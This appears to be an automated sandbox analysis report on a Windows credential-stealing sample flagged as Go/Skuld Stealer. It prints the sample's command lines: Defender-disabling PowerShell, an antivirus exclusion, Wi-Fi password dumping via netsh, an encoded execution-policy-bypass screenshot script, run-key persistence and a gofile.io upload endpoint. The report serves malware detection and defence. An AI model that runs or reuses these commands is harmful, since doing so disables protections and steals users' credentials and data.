Windows Analysis Report
WdlA0C4PkO.exe

Overview

General Information

Sample name: WdlA0C4PkO.exe (renamed because the original name is a hash value)
Original sample name: 2b344d8644f0d502c4c8370ef8674a51.exe
Analysis ID: 1577903
MD5: 2b344d8644f0d502c4c8370ef8674a51
SHA1: d14f20eaf8ea75d6f10c85e2b18fb1d0ee8781da
SHA256: bc1b77f9680b9028efd499e3e741d46db003f5470a8b61d21e445eaeb7141045
Tags: exe, user-abuse_ch

Detection

Go Stealer, Skuld Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Go Stealer
Yara detected Skuld Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • WdlA0C4PkO.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\WdlA0C4PkO.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7752 cmdline: attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 7772 cmdline: attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • WMIC.exe (PID: 7828 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 7896 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 7940 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 7964 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 8072 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • WMIC.exe (PID: 8156 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • powershell.exe (PID: 7332 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
    • WMIC.exe (PID: 6684 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • netsh.exe (PID: 7496 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • powershell.exe (PID: 7668 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuA
FQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 3556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 2572 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • attrib.exe (PID: 2968 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • SecurityHealthSystray.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SecurityHealthSystray.exe (PID: 3348 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe" MD5: 2B344D8644F0D502C4C8370EF8674A51)
    • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security
0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security
00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security
00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
22.2.SecurityHealthSystray.exe.280000.0.unpack | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security
22.2.SecurityHealthSystray.exe.280000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
22.2.SecurityHealthSystray.exe.280000.0.unpack | JoeSecurity_SkuldStealer | Yara detected Skuld Stealer | Joe Security
13.2.SecurityHealthSystray.exe.280000.0.unpack | JoeSecurity_GoStealer | Yara detected Go Stealer | Joe Security
13.2.SecurityHealthSystray.exe.280000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7648, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7332, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: frack113 | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7668, TargetFilename: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe, ProcessId: 7940, ProcessName: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\Desktop\WdlA0C4PkO.exe", ParentImage: C:\Users\user\Desktop\WdlA0C4PkO.exe, ParentProcessId: 7648, ParentProcessName: WdlA0C4PkO.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 7496, ProcessName: netsh.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | ReversingLabs: Detection: 55%
Source: WdlA0C4PkO.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | Joe Sandbox ML: detected
Source: WdlA0C4PkO.exe | Joe Sandbox ML: detected
Source: WdlA0C4PkO.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdb | source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: a1.pdbTa | source: powershell.exe, 00000012.00000002.1738126119.000001FCAB7CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.pdbhPR | source: powershell.exe, 00000012.00000002.1665126840.000001FC94B10000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 00000012.00000002.1664878909.000001FC918E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: http://ip-api.com/json
Source: powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1536659501.000001C9858E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1604710839.000001C99DBF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000C.00000002.1536659501.000001C9856C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC93511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
Source: WdlA0C4PkO.exe, 00000000.00000003.2046786886.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2055924100.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2007680510.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2009215764.000000C0001EC000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1684148367.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538095776.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.3355671817.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2075882669.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.2402745424.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1539272178.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1988403621.000000C0001EA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
